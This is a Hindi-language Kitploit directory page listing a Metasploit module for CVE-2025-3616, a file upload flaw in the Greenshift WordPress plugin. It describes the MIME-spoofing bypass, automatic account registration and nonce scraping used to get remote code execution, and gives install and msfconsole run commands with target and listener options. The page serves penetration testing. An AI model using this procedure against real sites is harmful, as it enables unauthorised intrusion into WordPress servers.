Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3616 — Metasploit मॉड्यूल जो Greenshift WordPress प्लगइन (CVE-2025-3616) में मनमाने फ़ाइल अपलोड का शोषण करता है, ताकि MIME स्पूफिंग के माध्यम से RCE प्राप्त किया जा सके, साथ ही स्वतः-पंजीकरण और nonce निष्कर्षण के साथ। | Kitploit
उपकरण/GitHubGitHub/b4d-53ct0r/cve-2025-3616
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणपेलोड डेवलपमेंट
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Metasploit मॉड्यूल जो Greenshift WordPress प्लगइन (CVE-2025-3616) में मनमाने फ़ाइल अपलोड का शोषण करता है, ताकि MIME स्पूफिंग के माध्यम से RCE प्राप्त किया जा सके, साथ ही स्वतः-पंजीकरण और nonce निष्कर्षण के साथ।

रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मेटास्प्लोइट मॉड्यूल: ग्रीनशिफ्ट वर्डप्रेस प्लगइन मनमाना फ़ाइल अपलोड (CVE-2025-3616)

इस रिपॉज़िटरी में CVE-2025-3616 का शोषण करने के लिए एक मेटास्प्लोइट मॉड्यूल शामिल है, जो ग्रीनशिफ्ट वर्डप्रेस प्लगइन (संस्करण 11.4 से 11.4.5) में एक मनमाना फ़ाइल अपलोड कमजोरी है।

यह शोषण प्रमाणित उपयोगकर्ताओं (Subscriber+) को मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे रिमोट कोड निष्पादन (RCE) होता है। यह GIF मैजिक बाइट्स (GIF89a;) का उपयोग करके MIME प्रकार को धोखा देकर प्लगइन के फ़ाइल प्रकार सत्यापन को बायपास करता है।

विशेषताएँ

  • प्रमाणीकरण हैंडलिंग: मौजूदा क्रेडेंशियल्स (USERNAME/PASSWORD) के साथ लॉगिन का समर्थन करता है।
  • स्वचालित पंजीकरण: एक REGISTER विकल्प शामिल करता है जो स्वचालित रूप से एक नए उपयोगकर्ता को पंजीकृत करता है और ताज़ा सत्र कुकीज़ का उपयोग करके कमजोरी का शोषण करता है (यदि लक्ष्य पर पंजीकरण सक्षम है तो उपयोगी)।
  • नॉन्स निष्कर्षण: प्रशासनिक डैशबोर्ड से आवश्यक wp_rest नॉन्स को स्वचालित रूप से स्क्रैप करता है।
  • सुरक्षा बाईपास: finfo_file() सत्यापन को बायपास करने के लिए PHP पेलोड में GIF मैजिक बाइट्स जोड़ता है।
  • स्थापना

    1. सुनिश्चित करें कि आपके पास मेटास्प्लोइट फ्रेमवर्क स्थापित है।

    2. wp_greenshift_file_upload.rb को अपनी स्थानीय मॉड्यूल निर्देशिका में कॉपी करें:

      root@kitploit:~
      mkdir -p ~/.msf4/modules/exploits/unix/webapp/
      cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
      
    3. msfconsole शुरू करें और मॉड्यूल को पुनः लोड करें:

      root@kitploit:~
      msfconsole
      msf6 > reload_all
      

    उपयोग

    1. स्वचालित पंजीकरण का उपयोग करना (अनुशंसित)

    यदि लक्ष्य पर उपयोगकर्ता पंजीकरण सक्षम है, तो आपको क्रेडेंशियल्स की आवश्यकता नहीं है।

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER true
    run
    

    2. मौजूदा क्रेडेंशियल्स का उपयोग करना

    यदि आपके पास पहले से एक वैध उपयोगकर्ता है (Subscriber या उच्च):

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER false
    set USERNAME <USER>
    set PASSWORD <PASS>
    run
    

    विकल्प

    विकल्पआवश्यकविवरण
    RHOSTSहाँलक्ष्य पता
    LHOSTहाँसुनने का पता (आपका IP)
    REGISTERनहींस्वचालित रूप से एक नया खाता पंजीकृत करने के लिए true पर सेट करें (डिफ़ॉल्ट: false)
    USERNAMEनहींवर्डप्रेस उपयोगकर्ता नाम (यदि REGISTER false है तो आवश्यक)
    PASSWORDनहींवर्डप्रेस पासवर्ड (यदि REGISTER false है तो आवश्यक)
    EMAILनहींपंजीकरण के लिए ईमेल (वैकल्पिक, खाली होने पर स्वचालित रूप से उत्पन्न)

    अस्वीकरण

    यह मॉड्यूल केवल शैक्षणिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस कोड का उपयोग अवैध है।

    टूल डाउनलोड करें